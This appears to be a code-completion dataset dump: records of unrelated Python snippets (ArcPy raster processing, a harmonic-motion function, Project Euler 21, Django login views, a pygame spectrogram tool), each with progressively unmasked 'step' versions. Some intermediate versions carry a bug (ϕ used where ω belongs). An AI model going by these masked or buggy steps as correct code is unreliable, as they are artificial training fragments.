PrintMsg(\"\\tCalculating raster statistics...\", 0)\r\n env.pyramid = \"PYRAMIDS -1 NEAREST\"\r\n arcpy.env.rasterStatistics = 'STATISTICS 100 100'\r\n arcpy.CalculateStatistics_management (outputRaster, 1, 1, \"\", \"OVERWRITE\" )\r\n\r\n if CheckStatistics(outputRaster) == False:\r\n # For some reason the BuildPyramidsandStatistics command failed to build statistics for this raster.\r\n #\r\n # Try using CalculateStatistics while setting an AOI\r\n PrintMsg(\"\\tInitial attempt to create statistics failed, trying another method...\", 0)\r\n time.sleep(3)\r\n\r\n if arcpy.Exists(os.path.join(gdb, \"SAPOLYGON\")):\r\n # Try running CalculateStatistics with an AOI to limit the area that is processed\r\n # if we have to use SAPOLYGON as an AOI, this will be REALLY slow\r\n #arcpy.CalculateStatistics_management (outputRaster, 1, 1, \"\", \"OVERWRITE\", os.path.join(outputWS, \"SAPOLYGON\") )\r\n arcpy.CalculateStatistics_management (outputRaster, 1, 1, \"\", \"OVERWRITE\" )\r\n\r\n if CheckStatistics(outputRaster) == False:\r\n time.sleep(3)\r\n PrintMsg(\"\\tFailed in both attempts to create statistics for raster layer\", 1)\r\n\r\n arcpy.SetProgressor(\"default\", \"Building pyramids...\")\r\n PrintMsg(\"\\tBuilding pyramids...\", 0)\r\n arcpy.BuildPyramids_management(outputRaster, \"-1\", \"NONE\", \"NEAREST\", \"DEFAULT\", \"\", \"SKIP_EXISTING\")\r\n\r\n # ****************************************************\r\n # Add MUKEY to final raster\r\n # ****************************************************\r\n # Build attribute table for final output raster. 
Sometimes it fails to automatically build.\r\n PrintMsg(\"\\tBuilding raster attribute table and updating MUKEY values\", )\r\n arcpy.SetProgressor(\"default\", \"Building raster attrribute table...\")\r\n arcpy.BuildRasterAttributeTable_management(outputRaster)\r\n\r\n # Add MUKEY values to final mapunit raster\r\n #\r\n arcpy.SetProgressor(\"default\", \"Adding MUKEY attribute to raster...\")\r\n arcpy.AddField_management(outputRaster, \"MUKEY\", \"TEXT\", \"#\", \"#\", \"30\")\r\n with arcpy.da.UpdateCursor(outputRaster, [\"VALUE\", \"MUKEY\"]) as cur:\r\n for rec in cur:\r\n rec[1] = rec[0]\r\n cur.updateRow(rec)\r\n\r\n # Add attribute index (MUKEY) for raster\r\n arcpy.AddIndex_management(outputRaster, [\"mukey\"], \"Indx_RasterMukey\")\r\n\r\n else:\r\n err = \"Missing output raster (\" + outputRaster + \")\"\r\n raise MyError, err\r\n\r\n # Compare list of original mukeys with the list of raster mukeys\r\n # Report discrepancies. These are usually thin polygons along survey boundaries,\r\n # added to facilitate a line-join.\r\n #\r\n arcpy.SetProgressor(\"default\", \"Looking for missing map units...\")\r\n rCnt = int(arcpy.GetRasterProperties_management (outputRaster, \"UNIQUEVALUECOUNT\").getOutput(0))\r\n\r\n if rCnt <> muCnt:\r\n missingList = list()\r\n rList = list()\r\n\r\n # Create list of raster mukeys...\r\n with arcpy.da.SearchCursor(outputRaster, (\"MUKEY\",)) as rcur:\r\n for rec in rcur:\r\n mukey = rec[0]\r\n rList.append(mukey)\r\n\r\n missingList = list(set(mukeyList) - set(rList))\r\n queryList = list()\r\n for mukey in missingList:\r\n queryList.append(\"'\" + mukey + \"'\")\r\n\r\n if len(queryList) > 0:\r\n PrintMsg(\"\\tDiscrepancy in mapunit count for new raster\", 1)\r\n #PrintMsg(\"\\t\\tInput polygon mapunits: \" + Number_Format(muCnt, 0, True), 0)\r\n #PrintMsg(\"\\t\\tOutput raster mapunits: \" + Number_Format(rCnt, 0, True), 0)\r\n PrintMsg(\"The following MUKEY values were present in the original MUPOLYGON featureclass, \", 1)\r\n PrintMsg(\"but not in the raster\", 1)\r\n PrintMsg(\"\\t\\tMUKEY IN (\" + \", \".join(queryList) + \") \\n \", 0)\r\n\r\n # Update metadata file for the geodatabase\r\n #\r\n # Query the output SACATALOG table to get list of surveys that were exported to the gSSURGO\r\n #\r\n #saTbl = os.path.join(theGDB, \"sacatalog\")\r\n #expList = list()\r\n\r\n #with arcpy.da.SearchCursor(saTbl, (\"AREASYMBOL\", \"SAVEREST\")) as srcCursor:\r\n # for rec in srcCursor:\r\n # expList.append(rec[0] + \" (\" + str(rec[1]).split()[0] + \")\")\r\n\r\n #surveyInfo = \", \".join(expList)\r\n surveyInfo = \"\" # could get this from SDA\r\n #time.sleep(2)\r\n arcpy.SetProgressorLabel(\"Updating metadata NOT...\")\r\n\r\n #bMetaData = UpdateMetadata(outputWS, outputRaster, surveyInfo, iRaster)\r\n\r\n del outputRaster\r\n del muPolygon\r\n\r\n arcpy.CheckInExtension(\"Spatial\")\r\n\r\n return True\r\n\r\n except MyError, e:\r\n # Example: raise MyError, \"This is an error message\"\r\n PrintMsg(str(e), 2)\r\n arcpy.CheckInExtension(\"Spatial\")\r\n return False\r\n\r\n except MemoryError:\r\n \traise MyError, \"Not enough memory to process. 
Try running again with the 'Use tiles' option\"\r\n\r\n except:\r\n errorMsg()\r\n arcpy.CheckInExtension(\"Spatial\")\r\n return False\r\n\r\n## ===================================================================================\r\n## ===================================================================================\r\n## MAIN\r\n## ===================================================================================\r\n\r\n# Import system modules\r\nimport sys, string, os, arcpy, locale, traceback, math, time, datetime, shutil\r\nimport xml.etree.cElementTree as ET\r\nfrom arcpy import env\r\n\r\n# Create the Geoprocessor object\r\ntry:\r\n if __name__ == \"__main__\":\r\n # get parameters\r\n muPolygon = arcpy.GetParameterAsText(0) # required gSSURGO polygon layer\r\n rasterName = arcpy.GetParameterAsText(1) # required name for output gdb raster\r\n\r\n env.overwriteOutput= True\r\n iRaster = 10\r\n\r\n # Get Spatial Analyst extension\r\n if arcpy.CheckExtension(\"Spatial\") == \"Available\":\r\n # try to find the name of the tile from the geodatabase name\r\n # set the name of the output raster using the tilename and cell resolution\r\n from arcpy.sa import *\r\n arcpy.CheckOutExtension(\"Spatial\")\r\n\r\n else:\r\n raise MyError, \"Required Spatial Analyst extension is not available\"\r\n\r\n # Call function that does all of the work\r\n bRaster = ConvertToRaster(muPolygon, theSnapRaster, iRaster)\r\n arcpy.CheckInExtension(\"Spatial\")\r\n\r\nexcept MyError, e:\r\n # Example: raise MyError, \"This is an error message\"\r\n PrintMsg(str(e), 2)\r\n\r\nexcept:\r\n errorMsg()\r\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import math as m
def calcula_elongacao(A, ϕ, ω, t):
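    # Simple harmonic motion elongation: x(t) = A * cos(ϕ + ω * t)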
    x = A * m.cos(ϕ + ω * t)
return x
|
normal
|
{
"blob_id": "225687729b64f455bcc841e83105c7444efdfad3",
"index": 5545,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef calcula_elongacao(A, φ, ω, t):\n x = A * m.cos(φ + φ * t)\n return x\n",
"step-3": "import math as m\n\n\ndef calcula_elongacao(A, φ, ω, t):\n x = A * m.cos(φ + φ * t)\n return x\n",
"step-4": "import math as m\n\ndef calcula_elongacao(A, ϕ, ω, t):\n x = A * m.cos(ϕ + ϕ * t )\n return x",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# 1. Closures
# 2. A first look at decorators
# 3. The standard decorator pattern
|
normal
|
{
"blob_id": "a1ebb00d7cda65cb528b2253e817d925214cdce3",
"index": 5847,
"step-1": "# 1.闭包\n# 2.装饰圈初识\n# 3.标准版装饰器",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
1
]
}
|
[
1
] |
#! /usr/bin/python
# Project Euler problem 21
"""Let d(n) be defined as the sum of proper divisors of n (numbers less than n which divide evenly into n).
If d(a) = b and d(b) = a, where a != b, then a and b are an amicable pair and each of a and b are called amicable numbers.
For example, the proper divisors of 220 are 1, 2, 4, 5, 10, 11, 20, 22, 44, 55 and 110; therefore d(220) = 284. The proper divisors of 284 are 1, 2, 4, 71 and 142; so d(284) = 220.
Evaluate the sum of all the amicable numbers under 10,000."""
import math
# This is inefficient.
def get_divs(n):
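    # Return the sorted list of proper divisors of n (trial division up to sqrt(n)).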
divs = [1]
check = 2
rootn = math.sqrt(n)
while check < rootn:
if n % check == 0:
divs.append(check)
divs.append(n / check)
check += 1
if rootn == check:
divs.append(check)
divs.sort()
return divs
def amicable(a):
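    # Return b = d(a) if (a, b) form an amicable pair with a != b, otherwise 0.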
b = sum(get_divs(a))
if a == b: return 0
sum_b_divs = sum(get_divs(b))
if a == sum_b_divs:
return b
return 0
print sum([amicable(i) for i in range(1, 10000)])
|
normal
|
{
"blob_id": "2ee5991e2b6de6ee48c8207f2b78574fc8a02fc0",
"index": 2432,
"step-1": "#! /usr/bin/python\n\n# Project Euler problem 21\n\n\"\"\"Let d(n) be defined as the sum of proper divisors of n (numbers less than n which divide evenly into n).\nIf d(a) = b and d(b) = a, where a != b, then a and b are an amicable pair and each of a and b are called amicable numbers.\n\nFor example, the proper divisors of 220 are 1, 2, 4, 5, 10, 11, 20, 22, 44, 55 and 110; therefore d(220) = 284. The proper divisors of 284 are 1, 2, 4, 71 and 142; so d(284) = 220.\n\nEvaluate the sum of all the amicable numbers under 10,000.\"\"\"\n\nimport math\n\n# This is inefficient.\ndef get_divs(n): \n divs = [1] \n check = 2 \n rootn = math.sqrt(n)\n \n while check < rootn: \n if n % check == 0: \n divs.append(check) \n divs.append(n / check) \n check += 1\n \n if rootn == check: \n divs.append(check) \n divs.sort()\n \n return divs \n\ndef amicable(a):\n b = sum(get_divs(a))\n \n if a == b: return 0\n \n sum_b_divs = sum(get_divs(b))\n \n if a == sum_b_divs:\n return b\n \n return 0\n\nprint sum([amicable(i) for i in range(1, 10000)])\n ",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from django.shortcuts import render, redirect
from django.contrib.auth import authenticate, login, logout
from django.http import HttpResponse
# Create your views here.
def check(request):
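    # Send unauthenticated users to the login page, everyone else to the worker area.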
if not request.user.is_authenticated:
return redirect('/auth/login/')
else:
return redirect('/worker/')
def loginpg(request):
return render(request, 'registration/login.html')
def logoutpg(request):
logout(request)
return render(request, 'registration/logout.html')
def auth(request):
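    # Authenticate the posted credentials and start a session on success.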
username = request.POST['username']
password = request.POST['password']
user = authenticate(request, username=username, password=password)
if user is not None:
login(request, user)
return redirect('/worker/')
else:
return render(request, 'registration/login_error.html')
|
normal
|
{
"blob_id": "fc2afc99dc754b58c36bc76c723727337851cc3e",
"index": 5326,
"step-1": "<mask token>\n\n\ndef check(request):\n if not request.user.is_authenticated:\n return redirect('/auth/login/')\n else:\n return redirect('/worker/')\n\n\ndef loginpg(request):\n return render(request, 'registration/login.html')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef check(request):\n if not request.user.is_authenticated:\n return redirect('/auth/login/')\n else:\n return redirect('/worker/')\n\n\ndef loginpg(request):\n return render(request, 'registration/login.html')\n\n\n<mask token>\n\n\ndef auth(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('/worker/')\n else:\n return render(request, 'registration/login_error.html')\n",
"step-3": "<mask token>\n\n\ndef check(request):\n if not request.user.is_authenticated:\n return redirect('/auth/login/')\n else:\n return redirect('/worker/')\n\n\ndef loginpg(request):\n return render(request, 'registration/login.html')\n\n\ndef logoutpg(request):\n logout(request)\n return render(request, 'registration/logout.html')\n\n\ndef auth(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('/worker/')\n else:\n return render(request, 'registration/login_error.html')\n",
"step-4": "from django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.http import HttpResponse\n\n\ndef check(request):\n if not request.user.is_authenticated:\n return redirect('/auth/login/')\n else:\n return redirect('/worker/')\n\n\ndef loginpg(request):\n return render(request, 'registration/login.html')\n\n\ndef logoutpg(request):\n logout(request)\n return render(request, 'registration/logout.html')\n\n\ndef auth(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('/worker/')\n else:\n return render(request, 'registration/login_error.html')\n",
"step-5": "from django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.http import HttpResponse\n\n# Create your views here.\n\ndef check(request):\n if not request.user.is_authenticated:\n return redirect('/auth/login/')\n else:\n return redirect('/worker/')\n\ndef loginpg(request):\n return render(request, 'registration/login.html')\n\n\ndef logoutpg(request):\n logout(request) \n return render(request, 'registration/logout.html')\n\n\n\ndef auth(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('/worker/')\n else:\n return render(request, 'registration/login_error.html')\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
import pygame
import wave
import threading
import numpy as np
import pylab
import struct
import io
from PIL import Image
import sounddevice as sd
# Process the audio spectrum
# voice.wav format: 8000 Hz sample rate, 16-bit, mono
class SpectrumMap:
def __init__(self):
FILENAME = 'Sound/SoundResource/voice.wav'
self.wavefile = wave.open(FILENAME, 'r')
self.nchannels = self.wavefile.getnchannels()
self.sample_width = self.wavefile.getsampwidth()
self.framerate = self.wavefile.getframerate()
self.numframes = self.wavefile.getnframes()
def seek(self, frame: int):
self.wavefile.setpos(frame)
def map(self, count: int, clear: bool=True):
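        # Read 'count' frames from the wave file and render them as a spectrogram image (cropped to the plot area).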
if clear:
pylab.plt.clf()
y = np.zeros(count)
for i in range(count):
val = self.wavefile.readframes(1)
left = val[0:2]
try:
v = struct.unpack('h', left)[0]
y[i] = v
except struct.error:
pass
data = io.BytesIO()
pylab.specgram(y, NFFT=32, Fs=self.framerate, noverlap=18)
pylab.savefig(data)
data.seek(0)
image = Image.open(data)
crop = image.crop((81, 59, 575, 426))
# crop = image
return crop
def raw(self, count, clear: bool=True):
if clear:
pylab.plt.clf()
y = np.zeros(count)
for i in range(count):
val = self.wavefile.readframes(1)
left = val[0:2]
try:
v = struct.unpack('h', left)[0]
y[i] = v
except struct.error:
pass
data = io.BytesIO()
# y = abs(np.fft.fft(y) * self.nchannels)
y = y[:len(y)//2]
# pylab.specgram(y, NFFT=1024, Fs=self.framerate, noverlap=900)
pylab.plt.ylim(-32768, 32768)
pylab.plot(range(count//2), y)
pylab.savefig(data)
data.seek(0)
image = Image.open(data)
crop = image.crop((81, 59, 575, 426))
# crop = image
return crop
@staticmethod
def blend(sp1, sp2, count: int):
im1 = sp1.map(count, clear=True)
im2 = sp2.raw(count, clear=False)
res = Image.blend(im1, im2, 0.5)
return res
# Process the audio spectrum - attempt real-time recording
# 0 Microsoft 声音映射器 - Output, MME (0 in, 2 out)
# < 1 扬声器 (Realtek High Definition, MME (0 in, 2 out)
# 2 主声音驱动程序, Windows DirectSound (0 in, 2 out)
# 3 扬声器 (Realtek High Definition Audio), Windows DirectSound (0 in, 2 out)
# 4 扬声器 (Realtek High Definition Audio), Windows WASAPI (0 in, 2 out)
# 5 Speakers (Realtek HD Audio output), Windows WDM-KS (0 in, 6 out)
# 6 立体声混音 (Realtek HD Audio Stereo input), Windows WDM-KS (2 in, 0 out)
# 7 线路输入 (Realtek HD Audio Line input), Windows WDM-KS (2 in, 0 out)
# 8 FrontMic (Realtek HD Audio Front Mic input), Windows WDM-KS (2 in, 0 out)
# 9 麦克风 (Realtek HD Audio Mic input), Windows WDM-KS (2 in, 0 out)
# fs = 44100 # Hz
# length = 5 # s
# recording = sd.rec(frames=fs * length, samplerate=fs, blocking=True, channels=1)
class SpectrumMap2:
def __init__(self):
devices = sd.query_devices()
device = 11
for i in range(len(devices)):
d = devices[i]
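            # '立体声混音' is the Chinese Windows label for the "Stereo Mix" loopback device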
if '立体声混音' in d['name']:
device = i
sd.default.device[0] = device
print('采用', devices[device]['name'], '录音')
self.nchannels = 1
self.framerate = 44100
def record(self, period: float):
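        # Record 'period' seconds of int16 mono audio from the selected input device.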
recording = sd.rec(frames=int(self.framerate * period),
samplerate=self.framerate, blocking=True, channels=self.nchannels, dtype='int16')
return recording.reshape((recording.size, ))
def map(self, ndata, clear: bool=True):
if clear:
pylab.plt.clf()
y = ndata
data = io.BytesIO()
pylab.specgram(y, NFFT=32, Fs=self.framerate, noverlap=18)
pylab.savefig(data)
data.seek(0)
image = Image.open(data)
# crop = image.crop((81, 59, 575, 426))
crop = image
return crop
@staticmethod
def raw(ndata, clear: bool=True):
if clear:
pylab.plt.clf()
y = ndata
count = len(ndata)
data = io.BytesIO()
# y = abs(np.fft.fft(y) * self.nchannels)
y = y[:len(y)//2]
pylab.plt.ylim(-32768, 32768)
pylab.plot(range(count//2), y)
pylab.savefig(data)
data.seek(0)
image = Image.open(data)
# crop = image.crop((81, 59, 575, 426))
crop = image
return crop
# @staticmethod
# def blend(sp1, sp2, ndata):
# im1 = sp1.map(ndata, clear=True)
# im2 = sp2.raw(ndata, clear=False)
# res = Image.blend(im1, im2, 0.5)
# return res
def fetch(self, period: float):
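        # Record a clip and return the rendered raw-waveform image for it.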
ndata = self.record(period)
# im1 = self.map(ndata, clear=True)
im2 = self.raw(ndata, clear=True)
# res = Image.blend(im1, im2, 0.5)
res = im2
return res
class Sound:
@staticmethod
def load():
pygame.mixer.init()
filename_song = 'Sound/SoundResource/world.execute(me);.mp3'
pygame.mixer.music.load(filename_song)
@staticmethod
def play():
pygame.mixer.music.play()
@staticmethod
def pause():
pygame.mixer.music.pause()
@staticmethod
def stop():
pygame.mixer.music.stop()
|
normal
|
{
"blob_id": "fbde00d727d7ea99d1a7704f46cb9850c8b210d7",
"index": 2610,
"step-1": "<mask token>\n\n\nclass SpectrumMap:\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass SpectrumMap2:\n\n def __init__(self):\n devices = sd.query_devices()\n device = 11\n for i in range(len(devices)):\n d = devices[i]\n if '立体声混音' in d['name']:\n device = i\n sd.default.device[0] = device\n print('采用', devices[device]['name'], '录音')\n self.nchannels = 1\n self.framerate = 44100\n\n def record(self, period: float):\n recording = sd.rec(frames=int(self.framerate * period), samplerate=\n self.framerate, blocking=True, channels=self.nchannels, dtype=\n 'int16')\n return recording.reshape((recording.size,))\n\n def map(self, ndata, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = ndata\n data = io.BytesIO()\n pylab.specgram(y, NFFT=32, Fs=self.framerate, noverlap=18)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image\n return crop\n\n @staticmethod\n def raw(ndata, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = ndata\n count = len(ndata)\n data = io.BytesIO()\n y = y[:len(y) // 2]\n pylab.plt.ylim(-32768, 32768)\n pylab.plot(range(count // 2), y)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image\n return crop\n\n def fetch(self, period: float):\n ndata = self.record(period)\n im2 = self.raw(ndata, clear=True)\n res = im2\n return res\n\n\nclass Sound:\n\n @staticmethod\n def load():\n pygame.mixer.init()\n filename_song = 'Sound/SoundResource/world.execute(me);.mp3'\n pygame.mixer.music.load(filename_song)\n\n @staticmethod\n def play():\n pygame.mixer.music.play()\n\n @staticmethod\n def pause():\n pygame.mixer.music.pause()\n\n @staticmethod\n def stop():\n pygame.mixer.music.stop()\n",
"step-2": "<mask token>\n\n\nclass SpectrumMap:\n <mask token>\n <mask token>\n <mask token>\n\n def raw(self, count, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = np.zeros(count)\n for i in range(count):\n val = self.wavefile.readframes(1)\n left = val[0:2]\n try:\n v = struct.unpack('h', left)[0]\n y[i] = v\n except struct.error:\n pass\n data = io.BytesIO()\n y = y[:len(y) // 2]\n pylab.plt.ylim(-32768, 32768)\n pylab.plot(range(count // 2), y)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image.crop((81, 59, 575, 426))\n return crop\n\n @staticmethod\n def blend(sp1, sp2, count: int):\n im1 = sp1.map(count, clear=True)\n im2 = sp2.raw(count, clear=False)\n res = Image.blend(im1, im2, 0.5)\n return res\n\n\nclass SpectrumMap2:\n\n def __init__(self):\n devices = sd.query_devices()\n device = 11\n for i in range(len(devices)):\n d = devices[i]\n if '立体声混音' in d['name']:\n device = i\n sd.default.device[0] = device\n print('采用', devices[device]['name'], '录音')\n self.nchannels = 1\n self.framerate = 44100\n\n def record(self, period: float):\n recording = sd.rec(frames=int(self.framerate * period), samplerate=\n self.framerate, blocking=True, channels=self.nchannels, dtype=\n 'int16')\n return recording.reshape((recording.size,))\n\n def map(self, ndata, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = ndata\n data = io.BytesIO()\n pylab.specgram(y, NFFT=32, Fs=self.framerate, noverlap=18)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image\n return crop\n\n @staticmethod\n def raw(ndata, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = ndata\n count = len(ndata)\n data = io.BytesIO()\n y = y[:len(y) // 2]\n pylab.plt.ylim(-32768, 32768)\n pylab.plot(range(count // 2), y)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image\n return crop\n\n def fetch(self, period: float):\n ndata = self.record(period)\n im2 = self.raw(ndata, clear=True)\n res = im2\n return res\n\n\nclass Sound:\n\n @staticmethod\n def load():\n pygame.mixer.init()\n filename_song = 'Sound/SoundResource/world.execute(me);.mp3'\n pygame.mixer.music.load(filename_song)\n\n @staticmethod\n def play():\n pygame.mixer.music.play()\n\n @staticmethod\n def pause():\n pygame.mixer.music.pause()\n\n @staticmethod\n def stop():\n pygame.mixer.music.stop()\n",
"step-3": "<mask token>\n\n\nclass SpectrumMap:\n <mask token>\n\n def seek(self, frame: int):\n self.wavefile.setpos(frame)\n\n def map(self, count: int, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = np.zeros(count)\n for i in range(count):\n val = self.wavefile.readframes(1)\n left = val[0:2]\n try:\n v = struct.unpack('h', left)[0]\n y[i] = v\n except struct.error:\n pass\n data = io.BytesIO()\n pylab.specgram(y, NFFT=32, Fs=self.framerate, noverlap=18)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image.crop((81, 59, 575, 426))\n return crop\n\n def raw(self, count, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = np.zeros(count)\n for i in range(count):\n val = self.wavefile.readframes(1)\n left = val[0:2]\n try:\n v = struct.unpack('h', left)[0]\n y[i] = v\n except struct.error:\n pass\n data = io.BytesIO()\n y = y[:len(y) // 2]\n pylab.plt.ylim(-32768, 32768)\n pylab.plot(range(count // 2), y)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image.crop((81, 59, 575, 426))\n return crop\n\n @staticmethod\n def blend(sp1, sp2, count: int):\n im1 = sp1.map(count, clear=True)\n im2 = sp2.raw(count, clear=False)\n res = Image.blend(im1, im2, 0.5)\n return res\n\n\nclass SpectrumMap2:\n\n def __init__(self):\n devices = sd.query_devices()\n device = 11\n for i in range(len(devices)):\n d = devices[i]\n if '立体声混音' in d['name']:\n device = i\n sd.default.device[0] = device\n print('采用', devices[device]['name'], '录音')\n self.nchannels = 1\n self.framerate = 44100\n\n def record(self, period: float):\n recording = sd.rec(frames=int(self.framerate * period), samplerate=\n self.framerate, blocking=True, channels=self.nchannels, dtype=\n 'int16')\n return recording.reshape((recording.size,))\n\n def map(self, ndata, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = ndata\n data = io.BytesIO()\n pylab.specgram(y, NFFT=32, Fs=self.framerate, noverlap=18)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image\n return crop\n\n @staticmethod\n def raw(ndata, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = ndata\n count = len(ndata)\n data = io.BytesIO()\n y = y[:len(y) // 2]\n pylab.plt.ylim(-32768, 32768)\n pylab.plot(range(count // 2), y)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image\n return crop\n\n def fetch(self, period: float):\n ndata = self.record(period)\n im2 = self.raw(ndata, clear=True)\n res = im2\n return res\n\n\nclass Sound:\n\n @staticmethod\n def load():\n pygame.mixer.init()\n filename_song = 'Sound/SoundResource/world.execute(me);.mp3'\n pygame.mixer.music.load(filename_song)\n\n @staticmethod\n def play():\n pygame.mixer.music.play()\n\n @staticmethod\n def pause():\n pygame.mixer.music.pause()\n\n @staticmethod\n def stop():\n pygame.mixer.music.stop()\n",
"step-4": "import pygame\nimport wave\nimport threading\nimport numpy as np\nimport pylab\nimport struct\nimport io\nfrom PIL import Image\nimport sounddevice as sd\n\n\nclass SpectrumMap:\n\n def __init__(self):\n FILENAME = 'Sound/SoundResource/voice.wav'\n self.wavefile = wave.open(FILENAME, 'r')\n self.nchannels = self.wavefile.getnchannels()\n self.sample_width = self.wavefile.getsampwidth()\n self.framerate = self.wavefile.getframerate()\n self.numframes = self.wavefile.getnframes()\n\n def seek(self, frame: int):\n self.wavefile.setpos(frame)\n\n def map(self, count: int, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = np.zeros(count)\n for i in range(count):\n val = self.wavefile.readframes(1)\n left = val[0:2]\n try:\n v = struct.unpack('h', left)[0]\n y[i] = v\n except struct.error:\n pass\n data = io.BytesIO()\n pylab.specgram(y, NFFT=32, Fs=self.framerate, noverlap=18)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image.crop((81, 59, 575, 426))\n return crop\n\n def raw(self, count, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = np.zeros(count)\n for i in range(count):\n val = self.wavefile.readframes(1)\n left = val[0:2]\n try:\n v = struct.unpack('h', left)[0]\n y[i] = v\n except struct.error:\n pass\n data = io.BytesIO()\n y = y[:len(y) // 2]\n pylab.plt.ylim(-32768, 32768)\n pylab.plot(range(count // 2), y)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image.crop((81, 59, 575, 426))\n return crop\n\n @staticmethod\n def blend(sp1, sp2, count: int):\n im1 = sp1.map(count, clear=True)\n im2 = sp2.raw(count, clear=False)\n res = Image.blend(im1, im2, 0.5)\n return res\n\n\nclass SpectrumMap2:\n\n def __init__(self):\n devices = sd.query_devices()\n device = 11\n for i in range(len(devices)):\n d = devices[i]\n if '立体声混音' in d['name']:\n device = i\n sd.default.device[0] = device\n print('采用', devices[device]['name'], '录音')\n self.nchannels = 1\n self.framerate = 44100\n\n def record(self, period: float):\n recording = sd.rec(frames=int(self.framerate * period), samplerate=\n self.framerate, blocking=True, channels=self.nchannels, dtype=\n 'int16')\n return recording.reshape((recording.size,))\n\n def map(self, ndata, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = ndata\n data = io.BytesIO()\n pylab.specgram(y, NFFT=32, Fs=self.framerate, noverlap=18)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image\n return crop\n\n @staticmethod\n def raw(ndata, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = ndata\n count = len(ndata)\n data = io.BytesIO()\n y = y[:len(y) // 2]\n pylab.plt.ylim(-32768, 32768)\n pylab.plot(range(count // 2), y)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image\n return crop\n\n def fetch(self, period: float):\n ndata = self.record(period)\n im2 = self.raw(ndata, clear=True)\n res = im2\n return res\n\n\nclass Sound:\n\n @staticmethod\n def load():\n pygame.mixer.init()\n filename_song = 'Sound/SoundResource/world.execute(me);.mp3'\n pygame.mixer.music.load(filename_song)\n\n @staticmethod\n def play():\n pygame.mixer.music.play()\n\n @staticmethod\n def pause():\n pygame.mixer.music.pause()\n\n @staticmethod\n def stop():\n pygame.mixer.music.stop()\n",
"step-5": "import pygame\nimport wave\nimport threading\nimport numpy as np\nimport pylab\nimport struct\nimport io\nfrom PIL import Image\nimport sounddevice as sd\n\n\n# 处理音频频谱\n# voice.wav 格式:8000 rate 16bit 单声道\nclass SpectrumMap:\n def __init__(self):\n FILENAME = 'Sound/SoundResource/voice.wav'\n self.wavefile = wave.open(FILENAME, 'r')\n\n self.nchannels = self.wavefile.getnchannels()\n self.sample_width = self.wavefile.getsampwidth()\n self.framerate = self.wavefile.getframerate()\n self.numframes = self.wavefile.getnframes()\n\n def seek(self, frame: int):\n self.wavefile.setpos(frame)\n\n def map(self, count: int, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = np.zeros(count)\n\n for i in range(count):\n val = self.wavefile.readframes(1)\n left = val[0:2]\n try:\n v = struct.unpack('h', left)[0]\n y[i] = v\n except struct.error:\n pass\n\n data = io.BytesIO()\n pylab.specgram(y, NFFT=32, Fs=self.framerate, noverlap=18)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image.crop((81, 59, 575, 426))\n # crop = image\n return crop\n\n def raw(self, count, clear: bool=True):\n if clear:\n pylab.plt.clf()\n y = np.zeros(count)\n\n for i in range(count):\n val = self.wavefile.readframes(1)\n left = val[0:2]\n try:\n v = struct.unpack('h', left)[0]\n y[i] = v\n except struct.error:\n pass\n\n data = io.BytesIO()\n # y = abs(np.fft.fft(y) * self.nchannels)\n y = y[:len(y)//2]\n # pylab.specgram(y, NFFT=1024, Fs=self.framerate, noverlap=900)\n pylab.plt.ylim(-32768, 32768)\n pylab.plot(range(count//2), y)\n pylab.savefig(data)\n data.seek(0)\n image = Image.open(data)\n crop = image.crop((81, 59, 575, 426))\n # crop = image\n return crop\n\n @staticmethod\n def blend(sp1, sp2, count: int):\n im1 = sp1.map(count, clear=True)\n im2 = sp2.raw(count, clear=False)\n res = Image.blend(im1, im2, 0.5)\n return res\n\n\n# 处理音频频谱 - 尝试实时录音\n# 0 Microsoft 声音映射器 